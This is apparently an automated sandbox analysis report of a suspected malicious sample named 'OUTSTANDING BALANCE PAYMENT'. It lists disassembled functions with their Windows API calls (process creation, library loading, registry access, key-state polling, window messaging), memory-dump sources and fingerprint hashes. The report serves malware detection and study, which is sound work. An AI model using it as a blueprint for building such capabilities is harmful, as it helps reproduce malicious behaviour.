                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 002C9588
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002C95B9
                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 002C95CB
                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 002C9605
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandle$FilePipe
                                                                  • String ID: nul
                                                                  • API String ID: 4209266947-2873401336
                                                                  • Opcode ID: 01ecb50f7b7f9441c3d99e0038898da4f9dd4e454c244ead5390c047766c78c3
                                                                  • Instruction ID: 41e2c4a87de7eb6c568ac6d1bf14eea09bb247e5639caa08bcebcaf66d89ac84
                                                                  • Opcode Fuzzy Hash: 01ecb50f7b7f9441c3d99e0038898da4f9dd4e454c244ead5390c047766c78c3
                                                                  • Instruction Fuzzy Hash: 09218E70610206AFDB21AF69DC49F9A7BE8AF44760F604B1DF8A1D72D0D770D9A1CB10
                                                                  Function 002C9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 002C9653
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002C9683
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 002C9694
                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002C96CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandle$FilePipe
                                                                  • String ID: nul
                                                                  • API String ID: 4209266947-2873401336
                                                                  • Opcode ID: 2793dd37c779bec27fdeea8222d6c9bcbad26f8c9d1e8e466a265d3630c3c0b2
                                                                  • Instruction ID: 524168b3a1bf4349c22a8f23c42e9883ced8ff02ccb836760aa6493237062a20
                                                                  • Opcode Fuzzy Hash: 2793dd37c779bec27fdeea8222d6c9bcbad26f8c9d1e8e466a265d3630c3c0b2
                                                                  • Instruction Fuzzy Hash: 5B2160715202069BDB249F699C49F9AB7ECAF45720F300B1DF8A1D72D0D7B0D8A1CB50
                                                                  Function 002CDAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 002CDB0A
                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002CDB5E
                                                                  • __swprintf.LIBCMT ref: 002CDB77
                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,0031DC00), ref: 002CDBB5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                  • String ID: %lu
                                                                  • API String ID: 3164766367-685833217
                                                                  • Opcode ID: 0b5c865f794ad90ce60de311a6901f2ff44e388403ed1528c68fa374f2a2979d
                                                                  • Instruction ID: 22d88cd7349760ee426820b3cb11d80de5ad33efba72327c690dac4f9a7d835e
                                                                  • Opcode Fuzzy Hash: 0b5c865f794ad90ce60de311a6901f2ff44e388403ed1528c68fa374f2a2979d
                                                                  • Instruction Fuzzy Hash: 2E216D35A00208AFCB11EBA4CD85EAEBBB8EF49704B104069F509E7291DB71EA51CF60
                                                                  Function 002BC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002BC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002BC84A
                                                                    • Part of subcall function 002BC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 002BC85D
                                                                    • Part of subcall function 002BC82D: GetCurrentThreadId.KERNEL32 ref: 002BC864
                                                                    • Part of subcall function 002BC82D: AttachThreadInput.USER32(00000000), ref: 002BC86B
                                                                  • GetFocus.USER32 ref: 002BCA05
                                                                    • Part of subcall function 002BC876: GetParent.USER32(?), ref: 002BC884
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 002BCA4E
                                                                  • EnumChildWindows.USER32(?,002BCAC4), ref: 002BCA76
                                                                  • __swprintf.LIBCMT ref: 002BCA90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                  • String ID: %s%d
                                                                  • API String ID: 3187004680-1110647743
                                                                  • Opcode ID: 79687da2242fe6c1bb1680da50955481c6ce246c9cb57562e800ae5d8bf5dde5
                                                                  • Instruction ID: 08636d2b7fa904bff4a83da92c94a51a6c16de9b4aaa550133dbaad409291e18
                                                                  • Opcode Fuzzy Hash: 79687da2242fe6c1bb1680da50955481c6ce246c9cb57562e800ae5d8bf5dde5
                                                                  • Instruction Fuzzy Hash: BD11B1756202097BCB02BFA08C89FEA376DAF44750F108066FE08AA186CB709965CF70
                                                                  Function 002A7A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 002A7AD8
                                                                    • Part of subcall function 002A7CF4: __mtinitlocknum.LIBCMT ref: 002A7D06
                                                                    • Part of subcall function 002A7CF4: EnterCriticalSection.KERNEL32(00000000,?,002A7ADD,0000000D), ref: 002A7D1F
                                                                  • InterlockedIncrement.KERNEL32(?), ref: 002A7AE5
                                                                  • __lock.LIBCMT ref: 002A7AF9
                                                                  • ___addlocaleref.LIBCMT ref: 002A7B17
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                  • String ID: `0
                                                                  • API String ID: 1687444384-1757186122
                                                                  • Opcode ID: 8be22ec02351b5be10d51c14e6aed5a60bd52bcc7a0adb8e75814d813c95a3b6
                                                                  • Instruction ID: b0b9ecfa75c85a5e61e84252ab26e7c4f9a78fd99aad5070d14c3aecdfcfc70f
                                                                  • Opcode Fuzzy Hash: 8be22ec02351b5be10d51c14e6aed5a60bd52bcc7a0adb8e75814d813c95a3b6
                                                                  • Instruction Fuzzy Hash: F80187B1514B00AFD721EF65C90A74ABBF0AF01324F208C4EE49A966A0CFB0A680CF15
                                                                  Function 002EE32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002EE33D
                                                                  • _memset.LIBCMT ref: 002EE34C
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00343D00,00343D44), ref: 002EE37B
                                                                  • CloseHandle.KERNEL32 ref: 002EE38D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                  • String ID: D=4
                                                                  • API String ID: 3277943733-3280879621
                                                                  • Opcode ID: 55e8321eab0c7c06d3935d0e5e910d76433502f3f619c9d7773e88ef0dece24c
                                                                  • Instruction ID: 558c1e9642373e98afd3c7b4350e1d3f8069c8b31b0ce33bd4528537fed61f97
                                                                  • Opcode Fuzzy Hash: 55e8321eab0c7c06d3935d0e5e910d76433502f3f619c9d7773e88ef0dece24c
                                                                  • Instruction Fuzzy Hash: 23F05EF9950304BBE2121B65AC55FBB7EACDB07758F004421BE08DF1A2DB75AE1086A8
                                                                  Function 002E1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002E19F3
                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 002E1A26
                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 002E1B49
                                                                  • CloseHandle.KERNEL32(?), ref: 002E1BBF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                  • String ID:
                                                                  • API String ID: 2364364464-0
                                                                  • Opcode ID: 6702c87fa1169948066c26c501ca0548623d053dc9d220ec570bf88e39aea4ac
                                                                  • Instruction ID: 675a9f96da8bba482f560befcc27beab75221b61b9889b041f4bcad60e08e7c7
                                                                  • Opcode Fuzzy Hash: 6702c87fa1169948066c26c501ca0548623d053dc9d220ec570bf88e39aea4ac
                                                                  • Instruction Fuzzy Hash: B781A370660201ABDF10EF65C896BADBBE5EF04724F14845AF905AF3C2D7B4E9618F90
                                                                  Function 002EE062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 002EE1D5
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 002EE20D
                                                                  • IsDlgButtonChecked.USER32(?,00000001), ref: 002EE248
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 002EE269
                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 002EE281
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$ButtonCheckedLongWindow
                                                                  • String ID:
                                                                  • API String ID: 3188977179-0
                                                                  • Opcode ID: c6e2e2c579922716ba547663d005edcfe81e0885e94ed50e637016730b7c116e
                                                                  • Instruction ID: a975fceb9de6cd865b585192ea56cb540db736362031ca467d7e801753ecd017
                                                                  • Opcode Fuzzy Hash: c6e2e2c579922716ba547663d005edcfe81e0885e94ed50e637016730b7c116e
                                                                  • Instruction Fuzzy Hash: 3361E2346A0285AFDF21DF59C850FAA77BAAB49300F864059F85D9B2A1C774ADA0CB11
                                                                  Function 002C1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 002C1CB4
                                                                  • VariantClear.OLEAUT32(00000013), ref: 002C1D26
                                                                  • VariantClear.OLEAUT32(00000000), ref: 002C1D81
                                                                  • VariantClear.OLEAUT32(?), ref: 002C1DF8
                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002C1E26
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Clear$ChangeInitType
                                                                  • String ID:
                                                                  • API String ID: 4136290138-0
                                                                  • Opcode ID: cfdfb63f123d7ce8379d563081633c6eb1613147d921042b112991f877839224
                                                                  • Instruction ID: 44b910b123e8ebbe838ffa3e2e8d73fe77883db86b2f0d954de4208e61d122df
                                                                  • Opcode Fuzzy Hash: cfdfb63f123d7ce8379d563081633c6eb1613147d921042b112991f877839224
                                                                  • Instruction Fuzzy Hash: 6B5138B5A10209EFDB14CF58C880EAAB7F8FF4D314B158559E95ADB305D730EA61CBA0
                                                                  Function 002E0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                  • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 002E06EE
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 002E077D
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 002E079B
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 002E07E1
                                                                  • FreeLibrary.KERNEL32(00000000,00000004), ref: 002E07FB
                                                                    • Part of subcall function 0029E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,002CA574,?,?,00000000,00000008), ref: 0029E675
                                                                    • Part of subcall function 0029E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,002CA574,?,?,00000000,00000008), ref: 0029E699
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 327935632-0
                                                                  • Opcode ID: e6a55dc732515151f8ccb19d4b080e7c0e3d77a4702bd8ea0930d5266b53f23a
                                                                  • Instruction ID: 899ddef11f001161e7c68bd671919f63e92af398c255d2cf630cee1a9a18c4dd
                                                                  • Opcode Fuzzy Hash: e6a55dc732515151f8ccb19d4b080e7c0e3d77a4702bd8ea0930d5266b53f23a
                                                                  • Instruction Fuzzy Hash: 23515979A51245DFCB00EFA8C8909ADF7B5BF08310F548056E916AB392DB70ED56CF50
                                                                  Function 002E2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002E2BB5,?,?), ref: 002E3C1D
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002E2EEF
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002E2F2E
                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002E2F75
                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 002E2FA1
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 002E2FAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                  • String ID:
                                                                  • API String ID: 3740051246-0
                                                                  • Opcode ID: 33714507320e3a4fa41caf9bcb8503a52a2cb23c2175ebede910135c1cb22afc
                                                                  • Instruction ID: dbbeaa7721a5bb8365ee58726c63b8ca9bfa2f81a081109b5e3e36714105d4d9
                                                                  • Opcode Fuzzy Hash: 33714507320e3a4fa41caf9bcb8503a52a2cb23c2175ebede910135c1cb22afc
                                                                  • Instruction Fuzzy Hash: C7517A71228244AFD704EF64C891E6AB7F8FF88304F54491EF596972A1DB70E928CF52
                                                                  Function 002ECCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3958d362f97bdac51c5fd8734edb5eda47690f93b8658c12760ffd1faf8f5bba
                                                                  • Instruction ID: 4a45b05c301c9602ebdd6cb5c4f9ad56b61472c0d6f1f7bd363884f27df4e4f7
                                                                  • Opcode Fuzzy Hash: 3958d362f97bdac51c5fd8734edb5eda47690f93b8658c12760ffd1faf8f5bba
                                                                  • Instruction Fuzzy Hash: 70413C39961285AFCB10DFF9CC44FA9BF68FB09310FA50125F819A72D1C771AD62CA50
                                                                  Function 002D1206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002D12B4
                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002D12DD
                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 002D131C
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 002D1341
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002D1349
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 1389676194-0
                                                                  • Opcode ID: ec3f9ad89fae247e4c921ecf86d83182b0d3d05b21a39bcd78759aff4ff8d126
                                                                  • Instruction ID: b61889715a9671305d61ad5c12bd0510d2d83dbe7a794b3a4711b0f86e183bed
                                                                  • Opcode Fuzzy Hash: ec3f9ad89fae247e4c921ecf86d83182b0d3d05b21a39bcd78759aff4ff8d126
                                                                  • Instruction Fuzzy Hash: 1F410D39A11105DFCB01EF64C9919ADBBF5FF08314B148095E905AB3A2DB31ED51DF50
                                                                  Function 0029B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32(000000FF), ref: 0029B64F
                                                                  • ScreenToClient.USER32(00000000,000000FF), ref: 0029B66C
                                                                  • GetAsyncKeyState.USER32(00000001), ref: 0029B691
                                                                  • GetAsyncKeyState.USER32(00000002), ref: 0029B69F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                  • String ID:
                                                                  • API String ID: 4210589936-0
                                                                  • Opcode ID: 4ec6d58d023208bc45425c6e248ea99a62f4ca4ac7b442dfe539c0c3223530a9
                                                                  • Instruction ID: 644fa2524055e88717a1bb8b8f821ce9161471760356713857df41c5cacd4bb9
                                                                  • Opcode Fuzzy Hash: 4ec6d58d023208bc45425c6e248ea99a62f4ca4ac7b442dfe539c0c3223530a9
                                                                  • Instruction Fuzzy Hash: 9441803551411ABBDF169F64C844EE9FBB9BB05360F10432AF86992290CB70A9A0DF91
                                                                  Function 002BB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 002BB369
                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 002BB413
                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 002BB41B
                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 002BB429
                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 002BB431
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
